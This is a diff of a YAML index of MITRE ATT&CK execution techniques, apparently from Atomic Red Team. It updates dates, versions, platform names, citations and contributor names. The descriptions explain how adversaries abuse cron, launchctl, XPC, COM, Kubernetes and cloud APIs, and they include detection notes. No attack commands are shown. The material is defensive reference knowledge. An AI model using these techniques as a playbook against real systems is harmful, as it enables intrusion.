-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24824,9 +25144,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests:
     - name: ListCronjobs
@@ -24987,20 +25306,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -25028,7 +25346,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -25048,33 +25366,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25091,6 +25389,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -25101,9 +25400,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -25111,8 +25414,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -25152,7 +25471,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -25177,12 +25496,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25262,11 +25579,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25326,12 +25642,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25429,9 +25744,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25448,19 +25763,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25469,7 +25783,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25506,11 +25820,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25547,11 +25860,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25570,13 +25882,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25655,7 +25966,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests:
     - name: Deploy Docker container
@@ -25694,7 +26004,7 @@ execution:
           \n"
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25705,6 +26015,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25715,16 +26026,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25755,14 +26066,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25828,9 +26136,8 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests:
     - name: ExecIntoContainer
@@ -25913,32 +26220,7 @@ execution:
         elevation_required: false
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25947,6 +26229,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25959,19 +26242,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -26014,7 +26320,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -26030,72 +26336,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
